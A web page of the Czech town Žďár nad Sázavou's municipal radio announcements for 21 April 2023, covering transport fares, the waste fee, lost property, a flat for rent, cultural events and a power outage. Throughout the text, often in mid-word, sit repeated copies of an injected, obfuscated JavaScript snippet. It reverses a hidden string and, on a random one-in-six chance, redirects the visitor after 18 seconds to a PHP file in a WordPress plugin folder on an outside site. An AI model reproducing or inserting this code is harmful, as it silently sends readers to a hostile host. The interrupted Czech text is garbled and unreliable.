Rainbow page separator

Hlášení městského rozhlasu vysílaného dne 21. dubna 2023

Pátek, 21. dubna 2023

Z ÚŘADU:

Od dubna 2023 došlo k částečné změně ceníku městské hromadné dopravy. Ceník nově motivuje cestující k bezho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovostním platbám. Jízdné placené bankovní kar$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou bude stát nově 10 Kč nebo 5 Kč za snížené jízdné. Platba ho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tově se naopak zvyšuje na 16 Kč nebo 8 Kč za snížené jízdné. Beze změny zůstávají ceny všech druhů časových kuponů, občanský, studentský i zlevněný na měsíc, čtvrtletí nebo rok. Bezho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovostní platby jsou nově výhodnější a urychlují odbavení u řidiče. Více na webu dopravce www.mhdzdar.cz.  

 

Odbor komunálních služeb oznamuje, že se blíží splatnost poplatku za komunální odpad, který má být uhrazen nejpozději  do 30. dubna. Poplatek můžete uhradit bankovním převodem pod přiděleným variabilním symbolem, nebo na pokladně městského úřadu v ho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovosti, nebo platební kar$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou. Bližší informace poskytne Bc. Sylva Pikulová na tel. čísle 566 688 187 nebo jsou k dispozici na webových stránkách města.

Odbor životního prostředí žádá o pomoc ty z vás, kteří putují krajinou a není jim lhostejné jak vypadá a jak vypadat bude. Pokud se na svých cestách po blízkém i vzdálenějším okolí setkáte se známkami eroze (erozní rýhy, strže, plošná eroze) nebo uvidíte erozní splachy na komunikacích v okolí $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toků na trvalých travních porostech, žádáme o nahlášení $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to stavu na telefonní číslo 566 688 348 (Ing. Sylva Judová, Městský úřad), 727 957 201 (Ing. Marta Doležalová, Státní pozemkový úřad) nebo mailových adresách: sylva.judova@zdarns.cz, m.dolezalova2@spucr.cz nebo www.ziva-puda.cz/eroze

 

ZTRÁTY A NÁLEZY:

Městský úřad, odbor finanční oznamuje, že na ztráty a nálezy byly předány svazek klíčů, finanční ho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovost, ces$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovní kufr, platební karta. Seznam všech nalezených věcí je zveřejněn na úřední desce i na facebooku města. Bližší informace Vám poskytne Alena Benešová na tel. čísle 566 688 146 nebo osobně v kanceláři, 1. patro, dveře č. 35 – ztráty a nálezy. 

 

VYHLÁŠENÉ ZÁMĚRY:

MĚSTO ŽĎÁR NAD SÁZAVOU vyhlašuje záměr na pronájem bytu č. 30 v budově č. p. 1905 na ulici Brodské č. or. 33 ve Žďáře nad Sázavou. Velikost bytu 1+1. Základní nájemné činí 1.802,- Kč/měsíc. Uzávěrka záměru je 4.5.2023 ve 12.00 hod. Přihlášky na uvedený záměr předávejte na Městský úřad v zalepených obálkách výrazně označených „Výběrové řízení na byt“, nejpozději do termínu uzávěrky záměru včetně.

 

 

KULTURNÍ POZVÁNKY:

Měs$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to Žďár nad Sázavou Vás zve na tradiční Žďárskou Filipojakubskou noc v neděli 30. dubna. Akce se uskuteční v areálu na Libušíně na hradech od 17.30 do 22 hodin. Na programu jsou hry pro děti, soutěže o Miss Čarodějnice, vys$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toupení gymnastek, mažoretek, parkour, street dance [strýt denc] a koncert kapely SORRY! Závěr akce bude patřit ohňové show. Všichni jste srdečně zváni.

Knihovna Matěje Josefa Sychry Vás zve na výstavu fo$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tografií Pavla Remara - Dvorečky a Dvorky starého Žďáru, která je umístěna v Čechově domě do konce dubna 2023. Dále pak až do konce dubna 2023 je možné v Galerii u Sychry zhlédnout výstavu fo$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tografií Jaroslava Provazníka – Místa, co určitě znáte. 

V Regionálním muzeu na Tvrzi probíhá do 24. dubna 2023 výstava Retrohrátky. K vidění budou hračky éry socialismu a také interaktivní dětská herna. Uvidíte například Rubikovu kostku, plechovou berušku na klíček nebo céčka a některé věci si budete moct i vyzkoušet. Více informací najdete na webu muzea www.muzeumzdar.cz nebo na Facebooku.

VÝLUKY:

EG.D, a. s. oznamuje přerušení dodávky elektrické energie dne 24. dubna 2023 v době od 8:00 do 15:00 hodin na ul. Dvorská včetně odběratelské trafostanice Vodárna Žďas č. 201244, ul. Santiniho č. o. 6, č. o. 24 cukrárna a domy v okolí, areál Tálského mlýna a okolí, rekreační areál Pilák. 

 

 

KONEC HLÁŠENÍ